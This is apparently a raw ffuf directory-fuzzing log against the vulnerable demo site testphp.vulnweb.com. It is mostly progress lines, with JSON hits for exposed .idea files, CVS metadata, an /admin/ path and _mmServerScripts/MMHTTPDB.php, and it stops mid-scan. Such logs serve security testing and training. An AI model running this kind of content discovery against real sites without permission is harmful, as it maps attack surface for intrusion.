Job [1/1] :: 0 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [30/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:01] :: Errors: 0 ::\n\u001b[2K:: Progress: [60/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [60/4842] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [89/4842] :: Job [1/1] :: 245 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [117/4842] :: Job [1/1] :: 186 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [119/4842] :: Job [1/1] :: 189 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [149/4842] :: Job [1/1] :: 172 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [149/4842] :: Job [1/1] :: 172 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [179/4842] :: Job [1/1] :: 162 req/sec :: Duration: [0:00:02] :: Errors: 0 ::\n\u001b[2K:: Progress: [179/4842] :: Job [1/1] :: 162 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [209/4842] :: Job [1/1] :: 131 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [210/4842] :: Job [1/1] :: 137 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [239/4842] :: Job [1/1] :: 159 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [266/4842] :: Job [1/1] :: 134 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [269/4842] :: Job [1/1] :: 157 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K{\"input\":{\"FFUFHASH\":\"MDJmYWQxMDk=\",\"FUZZ\":\"LmlkZWEvc2NvcGVzL3Njb3BlX3NldHRpbmdzLnhtbA==\"},\"position\":265,\"status\":200,\"length\":143,\"words\":13,\"lines\":5,\"content-type\":\"text/xml\",\"redirectlocation\":\"\",\"url\":\"http://testphp.vulnweb.com/.idea/scopes/scope_settings.xml\",\"duration\":183893741,\"scraper\":{},\"resultfile\":\"\",\"host\":\"testphp.vulnweb.com\"}\n\n\u001b[2K:: Progress: [269/4842] :: Job [1/1] :: 157 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K{\"input\":{\"FFUFHASH\":\"MDJmYWQxMDg=\",\"FUZZ\":\"LmlkZWEvbW9kdWxlcy54bWw=\"},\"position\":264,\"status\":200,\"length\":275,\"words\":26,\"lines\":10,\"content-type\":\"text/xml\",\"redirectlocation\":\"\",\"url\":\"http://testphp.vulnweb.com/.idea/modules.xml\",\"duration\":185743721,\"scraper\":{},\"resultfile\":\"\",\"host\":\"testphp.vulnweb.com\"}\n\n\u001b[2K:: Progress: [269/4842] :: Job [1/1] :: 157 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K{\"input\":{\"FFUFHASH\":\"MDJmYWQxMDc=\",\"FUZZ\":\"LmlkZWEvbWlzYy54bWw=\"},\"position\":263,\"status\":200,\"length\":266,\"words\":18,\"lines\":9,\"content-type\":\"text/xml\",\"redirectlocation\":\"\",\"url\":\"http://testphp.vulnweb.com/.idea/misc.xml\",\"duration\":191181603,\"scraper\":{},\"resultfile\":\"\",\"host\":\"testphp.vulnweb.com\"}\n\n\u001b[2K:: Progress: [270/4842] :: Job [1/1] :: 137 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K{\"input\":{\"FFUFHASH\":\"MDJmYWQxMDQ=\",\"FUZZ\":\"LmlkZWEvZW5jb2RpbmdzLnhtbA==\"},\"position\":260,\"status\":200,\"length\":171,\"words\":10,\"lines\":6,\"content-type\":\"text/xml\",\"redirectlocation\":\"\",\"url\":\"http://testphp.vulnweb.com/.idea/encodings.xml\",\"duration\":191455042,\"scraper\":{},\"resultfile\":\"\",\"host\":\"testphp.vulnweb.com\"}\n\n\u001b[2K:: Progress: [270/4842] :: Job [1/1] :: 137 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K\n\u001b[2K{\"input\":{\"FFUFHASH\":\"MDJmYWRmOQ==\",\"FUZZ\":\"LmlkZWEv\"},\"position\":249,\"status\":200,\"length\":951,\"words\":427,\"lines\":14,\"content-type\":\"text/html\",\"redirectlocation\":\"\",\"url\":\"http://testphp.vulnweb.com/.idea/\",\"duration\":194014504,\"scraper\":{},\"resultfile\":\"\",\"host\":\"testphp.vulnweb.com\"}\n\n\u001b[2K:: Progress: [270/4842] :: Job [1/1] :: 137 req/sec :: Duration: [0:00:03] :: Errors: 0 ::{\"input\":{\"FFUFHASH\":\"MDJmYWRmYQ==\",\"FUZZ\":\"LmlkZWEvLm5hbWU=\"},\"position\":250,\"status\":200,\"length\":6,\"words\":1,\"lines\":1,\"content-type\":\"application/octet-stream\",\"redirectlocation\":\"\",\"url\":\"http://testphp.vulnweb.com/.idea/.name\",\"duration\":194027623,\"scraper\":{},\"resultfile\":\"\",\"host\":\"testphp.vulnweb.com\"}\n\n\u001b[2K:: Progress: [270/4842] :: Job [1/1] :: 137 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [299/4842] :: Job [1/1] :: 157 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K{\"input\":{\"FFUFHASH\":\"MDJmYWQxMGU=\",\"FUZZ\":\"LmlkZWEvdmNzLnhtbA==\"},\"position\":270,\"status\":200,\"length\":173,\"words\":16,\"lines\":8,\"content-type\":\"text/xml\",\"redirectlocation\":\"\",\"url\":\"http://testphp.vulnweb.com/.idea/vcs.xml\",\"duration\":185261806,\"scraper\":{},\"resultfile\":\"\",\"host\":\"testphp.vulnweb.com\"}\n\n\u001b[2K:: Progress: [299/4842] :: Job [1/1] :: 157 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [299/4842] :: Job [1/1] :: 157 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K{\"input\":{\"FFUFHASH\":\"MDJmYWQxMTY=\",\"FUZZ\":\"LmlkZWEvd29ya3NwYWNlLnhtbA==\"},\"position\":278,\"status\":200,\"length\":12473,\"words\":1702,\"lines\":217,\"content-type\":\"text/xml\",\"redirectlocation\":\"\",\"url\":\"http://testphp.vulnweb.com/.idea/workspace.xml\",\"duration\":200617069,\"scraper\":{},\"resultfile\":\"\",\"host\":\"testphp.vulnweb.com\"}\n\n\u001b[2K:: Progress: [300/4842] :: Job [1/1] :: 135 req/sec :: Duration: [0:00:03] :: Errors: 0 ::\n\u001b[2K:: Progress: [329/4842] :: Job [1/1] :: 153 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [329/4842] :: Job [1/1] :: 153 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [358/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [358/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [387/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [409/4842] :: Job [1/1] :: 131 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [417/4842] :: Job [1/1] :: 130 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [446/4842] :: Job [1/1] :: 131 req/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\u001b[2K:: Progress: [448/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [476/4842] :: Job [1/1] :: 132 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [477/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [505/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [506/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [535/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [543/4842] :: Job [1/1] :: 131 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [565/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:05] :: Errors: 0 ::\n\u001b[2K:: Progress: [587/4842] :: Job [1/1] :: 130 req/sec :: Duration: [0:00:06] :: Errors: 0 ::\n\u001b[2K:: Progress: [595/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:06] :: Errors: 0 ::\n\u001b[2K:: Progress: [625/4842] :: Job [1/1] :: 132 req/sec :: Duration: [0:00:06] :: Errors: 0 ::\n\u001b[2K:: Progress: [626/4842] :: Job [1/1] :: 131 req/sec :: Duration: [0:00:06] :: Errors: 0 ::\n\u001b[2K:: Progress: [649/4842] :: Job [1/1] :: 132 req/sec :: Duration: [0:00:06] :: Errors: 0 ::\n\u001b[2K:: Progress: [650/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:06] :: Errors: 0 ::\n\u001b[2K:: Progress: [673/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:06] :: Errors: 0 ::\n\u001b[2K:: Progress: [684/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:06] :: Errors: 0 ::\n\u001b[2K:: Progress: [701/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:07] :: Errors: 0 ::\n\u001b[2K:: Progress: [712/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:07] :: Errors: 0 ::\n\u001b[2K:: Progress: [728/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:07] :: Errors: 0 ::\n\u001b[2K:: Progress: [754/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:07] :: Errors: 0 ::\n\u001b[2K:: Progress: [758/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:07] :: Errors: 0 ::\n\u001b[2K{\"input\":{\"FFUFHASH\":\"MDJmYWQyZWM=\",\"FUZZ\":\"X21tU2VydmVyU2NyaXB0cy8=\"},\"position\":748,\"status\":200,\"length\":400,\"words\":122,\"lines\":9,\"content-type\":\"text/html\",\"redirectlocation\":\"\",\"url\":\"http://testphp.vulnweb.com/_mmServerScripts/\",\"duration\":171100834,\"scraper\":{},\"resultfile\":\"\",\"host\":\"testphp.vulnweb.com\"}\n\n\u001b[2K:: Progress: [759/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:07] :: Errors: 0 ::\n\u001b[2K{\"input\":{\"FFUFHASH\":\"MDJmYWQyZWU=\",\"FUZZ\":\"X21tU2VydmVyU2NyaXB0cy9NTUhUVFBEQi5waHA=\"},\"position\":750,\"status\":200,\"length\":93,\"words\":4,\"lines\":1,\"content-type\":\"text/html; charset=UTF-8\",\"redirectlocation\":\"\",\"url\":\"http://testphp.vulnweb.com/_mmServerScripts/MMHTTPDB.php\",\"duration\":171393339,\"scraper\":{},\"resultfile\":\"\",\"host\":\"testphp.vulnweb.com\"}\n\n\u001b[2K:: Progress: [759/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:07] :: Errors: 0 ::\n\u001b[2K:: Progress: [785/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:07] :: Errors: 0 ::\n\u001b[2K:: Progress: [788/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:07] :: Errors: 0 ::\n\u001b[2K:: Progress: [815/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:07] :: Errors: 0 ::\n\u001b[2K:: Progress: [819/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:08] :: Errors: 0 ::\n\u001b[2K:: Progress: [845/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:08] :: Errors: 0 ::\n\u001b[2K:: Progress: [851/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:08] :: Errors: 0 ::\n\u001b[2K:: Progress: [875/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:08] :: Errors: 0 ::\n\u001b[2K{\"input\":{\"FFUFHASH\":\"MDJmYWQzNjY=\",\"FUZZ\":\"YWRtaW4v\"},\"position\":870,\"status\":200,\"length\":262,\"words\":66,\"lines\":8,\"content-type\":\"text/html\",\"redirectlocation\":\"\",\"url\":\"http://testphp.vulnweb.com/admin/\",\"duration\":190799009,\"scraper\":{},\"resultfile\":\"\",\"host\":\"testphp.vulnweb.com\"}\n\n\u001b[2K:: Progress: [879/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:08] :: Errors: 0 ::\n\u001b[2K:: Progress: [889/4842] :: Job [1/1] :: 132 req/sec :: Duration: [0:00:08] :: Errors: 0 ::\n\u001b[2K:: Progress: [902/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:08] :: Errors: 0 ::\n\u001b[2K:: Progress: [924/4842] :: Job [1/1] :: 130 req/sec :: Duration: [0:00:08] :: Errors: 0 ::\n\u001b[2K:: Progress: [930/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:08] :: Errors: 0 ::\n\u001b[2K:: Progress: [956/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:09] :: Errors: 0 ::\n\u001b[2K:: Progress: [959/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:09] :: Errors: 0 ::\n\u001b[2K:: Progress: [986/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:09] :: Errors: 0 ::\n\u001b[2K:: Progress: [992/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:09] :: Errors: 0 ::\n\u001b[2K:: Progress: [1016/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:09] :: Errors: 0 ::\n\u001b[2K:: Progress: [1026/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:09] :: Errors: 0 ::\n\u001b[2K:: Progress: [1046/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:09] :: Errors: 0 ::\n\u001b[2K:: Progress: [1072/4842] :: Job [1/1] :: 132 req/sec :: Duration: [0:00:09] :: Errors: 0 ::\n\u001b[2K:: Progress: [1077/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:10] :: Errors: 0 ::\n\u001b[2K:: Progress: [1088/4842] :: Job [1/1] :: 131 req/sec :: Duration: [0:00:10] :: Errors: 0 ::\n\u001b[2K:: Progress: [1095/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:10] :: Errors: 0 ::\n\u001b[2K:: Progress: [1106/4842] :: Job [1/1] :: 111 req/sec :: Duration: [0:00:10] :: Errors: 0 ::\n\u001b[2K:: Progress: [1117/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:10] :: Errors: 0 ::\n\u001b[2K:: Progress: [1136/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:10] :: Errors: 0 ::\n\u001b[2K:: Progress: [1156/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:10] :: Errors: 0 ::\n\u001b[2K:: Progress: [1166/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:10] :: Errors: 0 ::\n\u001b[2K:: Progress: [1186/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:11] :: Errors: 0 ::\n\u001b[2K:: Progress: [1196/4842] :: Job [1/1] :: 110 req/sec :: Duration: [0:00:11] :: Errors: 0 ::\n\u001b[2K:: Progress: [1221/4842] :: Job [1/1] :: 108 req/sec :: Duration: [0:00:11] :: Errors: 0 ::\n\u001b[2K:: Progress: [1225/4842] :: Job [1/1] :: 107 req/sec :: Duration: [0:00:11] :: Errors: 0 ::\n\u001b[2K:: Progress: [1249/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:11] :: Errors: 0 ::\n\u001b[2K:: Progress: [1264/4842] :: Job [1/1] :: 131 req/sec :: Duration: [0:00:11] :: Errors: 0 ::\n\u001b[2K:: Progress: [1279/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:11] :: Errors: 0 ::\n\u001b[2K:: Progress: [1303/4842] :: Job [1/1] :: 132 req/sec :: Duration: [0:00:11] :: Errors: 0 ::\n\u001b[2K:: Progress: [1310/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:12] :: Errors: 0 ::\n\u001b[2K:: Progress: [1322/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:12] :: Errors: 0 ::\n\u001b[2K:: Progress: [1332/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:12] :: Errors: 0 ::\n\u001b[2K:: Progress: [1341/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:12] :: Errors: 0 ::\n\u001b[2K:: Progress: [1359/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:12] :: Errors: 0 ::\n\u001b[2K:: Progress: [1374/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:12] :: Errors: 0 ::\n\u001b[2K:: Progress: [1387/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:12] :: Errors: 0 ::\n\u001b[2K:: Progress: [1404/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:12] :: Errors: 0 ::\n\u001b[2K:: Progress: [1417/4842] :: Job [1/1] :: 110 req/sec :: Duration: [0:00:13] :: Errors: 0 ::\n\u001b[2K:: Progress: [1432/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:13] :: Errors: 0 ::\n\u001b[2K:: Progress: [1453/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:13] :: Errors: 0 ::\n\u001b[2K:: Progress: [1460/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:13] :: Errors: 0 ::\n\u001b[2K:: Progress: [1482/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:13] :: Errors: 0 ::\n\u001b[2K:: Progress: [1497/4842] :: Job [1/1] :: 130 req/sec :: Duration: [0:00:13] :: Errors: 0 ::\n\u001b[2K:: Progress: [1510/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:13] :: Errors: 0 ::\n\u001b[2K:: Progress: [1528/4842] :: Job [1/1] :: 130 req/sec :: Duration: [0:00:13] :: Errors: 0 ::\n\u001b[2K:: Progress: [1544/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:14] :: Errors: 0 ::\n\u001b[2K:: Progress: [1552/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:14] :: Errors: 0 ::\n\u001b[2K:: Progress: [1567/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:14] :: Errors: 0 ::\n\u001b[2K:: Progress: [1574/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:14] :: Errors: 0 ::\n\u001b[2K:: Progress: [1595/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:14] :: Errors: 0 ::\n\u001b[2K:: Progress: [1612/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:14] :: Errors: 0 ::\n\u001b[2K:: Progress: [1623/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:14] :: Errors: 0 ::\n\u001b[2K:: Progress: [1642/4842] :: Job [1/1] :: 119 req/sec :: Duration: [0:00:14] :: Errors: 0 ::\n\u001b[2K:: Progress: [1656/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:15] :: Errors: 0 ::\n\u001b[2K:: Progress: [1665/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:15] :: Errors: 0 ::\n\u001b[2K:: Progress: [1680/4842] :: Job [1/1] :: 115 req/sec :: Duration: [0:00:15] :: Errors: 0 ::\n\u001b[2K:: Progress: [1688/4842] :: Job [1/1] :: 105 req/sec :: Duration: [0:00:15] :: Errors: 0 ::\n\u001b[2K:: Progress: [1704/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:15] :: Errors: 0 ::\n\u001b[2K:: Progress: [1719/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:15] :: Errors: 0 ::\n\u001b[2K:: Progress: [1726/4842] :: Job [1/1] :: 112 req/sec :: Duration: [0:00:15] :: Errors: 0 ::\n\u001b[2K:: Progress: [1746/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:15] :: Errors: 0 ::\n\u001b[2K:: Progress: [1759/4842] :: Job [1/1] :: 109 req/sec :: Duration: [0:00:16] :: Errors: 0 ::\n\u001b[2K:: Progress: [1765/4842] :: Job [1/1] :: 104 req/sec :: Duration: [0:00:16] :: Errors: 0 ::\n\u001b[2K:: Progress: [1780/4842] :: Job [1/1] :: 105 req/sec :: Duration: [0:00:16] :: Errors: 0 ::\n\u001b[2K:: Progress: [1788/4842] :: Job [1/1] :: 98 req/sec :: Duration: [0:00:16] :: Errors: 0 ::\n\u001b[2K:: Progress: [1808/4842] :: Job [1/1] :: 103 req/sec :: Duration: [0:00:16] :: Errors: 0 ::\n\u001b[2K:: Progress: [1820/4842] :: Job [1/1] :: 103 req/sec :: Duration: [0:00:16] :: Errors: 0 ::\n\u001b[2K:: Progress: [1837/4842] :: Job [1/1] :: 111 req/sec :: Duration: [0:00:16] :: Errors: 0 ::\n\u001b[2K:: Progress: [1853/4842] :: Job [1/1] :: 110 req/sec :: Duration: [0:00:16] :: Errors: 0 ::\n\u001b[2K:: Progress: [1869/4842] :: Job [1/1] :: 113 req/sec :: Duration: [0:00:17] :: Errors: 0 ::\n\u001b[2K:: Progress: [1883/4842] :: Job [1/1] :: 117 req/sec :: Duration: [0:00:17] :: Errors: 0 ::\n\u001b[2K:: Progress: [1902/4842] :: Job [1/1] :: 114 req/sec :: Duration: [0:00:17] :: Errors: 0 ::\n\u001b[2K:: Progress: [1923/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:17] :: Errors: 0 ::\n\u001b[2K:: Progress: [1930/4842] :: Job [1/1] :: 127 req/sec :: Duration: [0:00:17] :: Errors: 0 ::\n\u001b[2K{\"input\":{\"FFUFHASH\":\"MDJmYWQ3N2M=\",\"FUZZ\":\"Q1ZTL0VudHJpZXM=\"},\"position\":1916,\"status\":200,\"length\":1,\"words\":2,\"lines\":1,\"content-type\":\"application/octet-stream\",\"redirectlocation\":\"\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries\",\"duration\":170736832,\"scraper\":{},\"resultfile\":\"\",\"host\":\"testphp.vulnweb.com\"}\n\n\u001b[2K:: Progress: [1937/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:17] :: Errors: 0 ::\n\u001b[2K{\"input\":{\"FFUFHASH\":\"MDJmYWQ3N2Q=\",\"FUZZ\":\"Q1ZTL1Jvb3Q=\"},\"position\":1917,\"status\":200,\"length\":1,\"words\":2,\"lines\":1,\"content-type\":\"application/octet-stream\",\"redirectlocation\":\"\",\"url\":\"http://testphp.vulnweb.com/CVS/Root\",\"duration\":171753902,\"scraper\":{},\"resultfile\":\"\",\"host\":\"testphp.vulnweb.com\"}\n\n\u001b[2K:: Progress: [1937/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:17] :: Errors: 0 ::\n\u001b[2K{\"input\":{\"FFUFHASH\":\"MDJmYWQ3N2E=\",\"FUZZ\":\"Q1ZTLw==\"},\"position\":1914,\"status\":200,\"length\":595,\"words\":262,\"lines\":11,\"content-type\":\"text/html\",\"redirectlocation\":\"\",\"url\":\"http://testphp.vulnweb.com/CVS/\",\"duration\":175241838,\"scraper\":{},\"resultfile\":\"\",\"host\":\"testphp.vulnweb.com\"}\n\n\u001b[2K:: Progress: [1937/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:17] :: Errors: 0 ::\n\u001b[2K:: Progress: [1954/4842] :: Job [1/1] :: 132 req/sec :: Duration: [0:00:17] :: Errors: 0 ::\n\u001b[2K:: Progress: [1960/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:17] :: Errors: 0 ::\n\u001b[2K:: Progress: [1981/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:17] :: Errors: 0 ::\n\u001b[2K:: Progress: [1997/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:18] :: Errors: 0 ::\n\u001b[2K:: Progress: [2013/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:18] :: Errors: 0 ::\n\u001b[2K:: Progress: [2026/4842] :: Job [1/1] :: 130 req/sec :: Duration: [0:00:18] :: Errors: 0 ::\n\u001b[2K:: Progress: [2042/4842] :: Job [1/1] :: 122 req/sec :: Duration: [0:00:18] :: Errors: 0 ::\n\u001b[2K:: Progress: [2056/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:18] :: Errors: 0 ::\n\u001b[2K:: Progress: [2072/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:18] :: Errors: 0 ::\n\u001b[2K:: Progress: [2088/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:18] :: Errors: 0 ::\n\u001b[2K:: Progress: [2104/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:18] :: Errors: 0 ::\n\u001b[2K:: Progress: [2122/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:19] :: Errors: 0 ::\n\u001b[2K:: Progress: [2135/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:19] :: Errors: 0 ::\n\u001b[2K:: Progress: [2152/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:19] :: Errors: 0 ::\n\u001b[2K:: Progress: [2168/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:19] :: Errors: 0 ::\n\u001b[2K:: Progress: [2182/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:19] :: Errors: 0 ::\n\u001b[2K:: Progress: [2200/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:19] :: Errors: 0 ::\n\u001b[2K:: Progress: [2212/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:19] :: Errors: 0 ::\n\u001b[2K:: Progress: [2232/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:19] :: Errors: 0 ::\n\u001b[2K:: Progress: [2246/4842] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:20] :: Errors: 0 ::\n\u001b[2K:: Progress: [2258/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:20] :: Errors: 0 ::\n\u001b[2K:: Progress: [2278/4842] :: Job [1/1] :: 132 req/sec :: Duration: [0:00:20] :: Errors: 0 ::\n\u001b[2K:: Progress: [2289/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:20] :: Errors: 0 ::\n\u001b[2K:: Progress: [2306/4842] :: Job [1/1] :: 130 req/sec :: Duration: [0:00:20] :: Errors: 0 ::\n\u001b[2K:: Progress: [2319/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:20] :: Errors: 0 ::\n\u001b[2K:: Progress: [2335/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:20] :: Errors: 0 ::\n\u001b[2K:: Progress: [2351/4842] :: Job [1/1] :: 123 req/sec :: Duration: [0:00:20] :: Errors: 0 ::\n\u001b[2K:: Progress: [2368/4842] :: Job [1/1] :: 124 req/sec :: Duration: [0:00:21] :: Errors: 0 ::\n\u001b[2K:: Progress: [2377/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:21] :: Errors: 0 ::\n\u001b[2K:: Progress: [2396/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:21] :: Errors: 0 ::\n\u001b[2K:: Progress: [2413/4842] :: Job [1/1] :: 125 req/sec :: Duration: [0:00:21] :: Errors: 0 ::\n\u001b[2K:: Progress: [2423/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:21] :: Errors: 0 ::\n\u001b[2K:: Progress: [2443/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:21] :: Errors: 0 ::\n\u001b[2K:: Progress: [2452/4842] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:21] :: Errors: 0 ::\n\u001b[2K:: Progress: [2472/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:21] :: Errors: 0 ::\n\u001b[2K:: Progress: [2486/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:22] :: Errors: 0 ::\n\u001b[2K:: Progress: [2501/4842] :: Job [1/1] :: 129 req/sec :: Duration: [0:00:22] :: Errors: 0 ::\n\u001b[2K:: Progress: [2516/4842] :: Job [1/1] :: 118 req/sec :: Duration: [0:00:22] :: Errors: 0 ::\n\u001b[2K:: Progress: [2535/4842] :: Job [1/1] :: 121 req/sec :: Duration: [0:00:22] :: Errors: 0 ::\n\u001b[2K:: Progress: [2544/4842] :: Job [1/1] :: 120 req/sec :: Duration: [0:00:22] :: Errors: 0 ::\n\u001b[2K:: Progress: [2566/4842] :: Job [1/1] :: 128 req/sec :: Duration: [0:00:22] :: Errors: 0 